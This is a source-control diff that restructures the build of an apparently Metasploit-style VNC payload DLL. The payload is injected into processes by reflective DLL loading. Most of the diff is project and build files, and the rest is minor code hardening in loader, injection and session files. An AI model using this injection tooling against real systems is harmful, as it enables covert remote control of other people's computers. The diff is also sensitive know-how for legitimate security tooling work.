LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

6
external/source/vncdll/loader/loader.rc vendored
View File

@ -1,6 +0,0 @@
#ifdef _X64_
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
#endif

437
external/source/vncdll/loader/loader.vcproj vendored
View File

@ -1,437 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="loader"
ProjectGUID="{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
RootNamespace="loader"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X86_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X64_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.x64.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.x64.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\context.c"
>
</File>
<File
RelativePath=".\loader.c"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.c"
>
</File>
<File
RelativePath=".\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.c"
>
</File>
<File
RelativePath=".\ps.c"
>
</File>
<File
RelativePath=".\session.c"
>
</File>
</Filter>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\context.h"
>
</File>
<File
RelativePath=".\loader.h"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.h"
>
</File>
<File
RelativePath=".\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\ReflectiveLoader.h"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.h"
>
</File>
<File
RelativePath=".\ps.h"
>
</File>
<File
RelativePath=".\session.h"
>
</File>
</Filter>
</Filter>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
>
<File
RelativePath=".\loader.rc"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>

32
external/source/vncdll/make.bat vendored Executable file
View File

@ -0,0 +1,32 @@
@ECHO OFF
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
IF "%1"=="x86" GOTO BUILD_X86
IF "%1"=="X64" GOTO BUILD_X64
ECHO "Building VNCDLL x64 and x86 (Release)"
SET PLAT=all
GOTO RUN
:BUILD_X86
ECHO "Building VNCDLL x86 (Release)"
SET PLAT=x86
GOTO RUN
:BUILD_X64
ECHO "Building VNCDLL x64 (Release)"
SET PLAT=x64
GOTO RUN
:RUN
PUSHD workspace
msbuild.exe make.msbuild /target:%PLAT%
POPD
GOTO :END
:NEED_VS
ECHO "This command must be executed from within a Visual Studio Command prompt."
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
:END

19
external/source/vncdll/make.msbuild vendored Executable file
View File

@ -0,0 +1,19 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\vncdll.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building VNCDLL x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="Building VNCDLL x64 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>

BIN
external/source/vncdll/output/vncdll.dll vendored
View File

Binary file not shown.

BIN
external/source/vncdll/output/vncdll.x64.dll vendored
View File

Binary file not shown.

30
external/source/vncdll/winvnc/vncdll.sln → external/source/vncdll/vncdll.sln vendored Normal file → Executable file
View File

@ -1,11 +1,10 @@
Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
ProjectSection(ProjectDependencies) = postProject
{EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
EndProjectSection
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -15,19 +14,22 @@ Global
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE

0
external/source/vncdll/loader/LICENSE.txt → external/source/vncdll/vncdll/LICENSE.txt vendored
View File

2
external/source/vncdll/loader/context.c → external/source/vncdll/vncdll/context.c vendored Normal file → Executable file
View File

@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
{
do
{
_snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
_snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );

0
external/source/vncdll/loader/context.h → external/source/vncdll/vncdll/context.h vendored
View File

2
external/source/vncdll/loader/inject.c → external/source/vncdll/vncdll/inject.c vendored Normal file → Executable file
View File

@ -1,7 +1,7 @@
#include "loader.h"
#include "ps.h"
#include "inject.h"
#include "LoadLibraryR.h"
#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include <Tlhelp32.h>
// Simple trick to get the current meterpreters arch

0
external/source/vncdll/loader/inject.h → external/source/vncdll/vncdll/inject.h vendored
View File

5
external/source/vncdll/loader/loader.c → external/source/vncdll/vncdll/loader.c vendored Normal file → Executable file
View File

@ -5,11 +5,12 @@
#include "ps.h"
#include "session.h"
#include "inject.h"
#include "ReflectiveLoader.h"
#define VNCFLAG_DISABLECOURTESYSHELL 1
#define VNCFLAG_DISABLESESSIONTRACKING 2
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
/*
* The HINSTANCE of this injected dll.
*/
@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
hAgentProcess = hProcess;
_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
_snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
} while( 0 );

0
external/source/vncdll/loader/loader.h → external/source/vncdll/vncdll/loader.h vendored
View File

18
external/source/vncdll/vncdll/loader.rc vendored Executable file
View File

@ -0,0 +1,18 @@
#ifdef _X64_
#ifdef _DEBUG
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
#endif
#else
#ifdef _DEBUG
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
#endif
#endif

0
external/source/vncdll/loader/ps.c → external/source/vncdll/vncdll/ps.c vendored
View File

0
external/source/vncdll/loader/ps.h → external/source/vncdll/vncdll/ps.h vendored
View File

6
external/source/vncdll/loader/session.c → external/source/vncdll/vncdll/session.c vendored Normal file → Executable file
View File

@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
{
if( !pProcessIdToSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
}
@ -53,7 +53,7 @@ DWORD session_activeid()
{
if( !pWTSGetActiveConsoleSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
}
@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
CloseHandle( hToken );
}
hKernel = LoadLibrary( "kernel32" );
hKernel = LoadLibraryA( "kernel32" );
if( !hKernel )
break;

0
external/source/vncdll/loader/session.h → external/source/vncdll/vncdll/session.h vendored
View File

245
external/source/vncdll/vncdll/vncdll.vcxproj vendored Executable file
View File

@ -0,0 +1,245 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}</ProjectGuid>
<RootNamespace>vncdll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
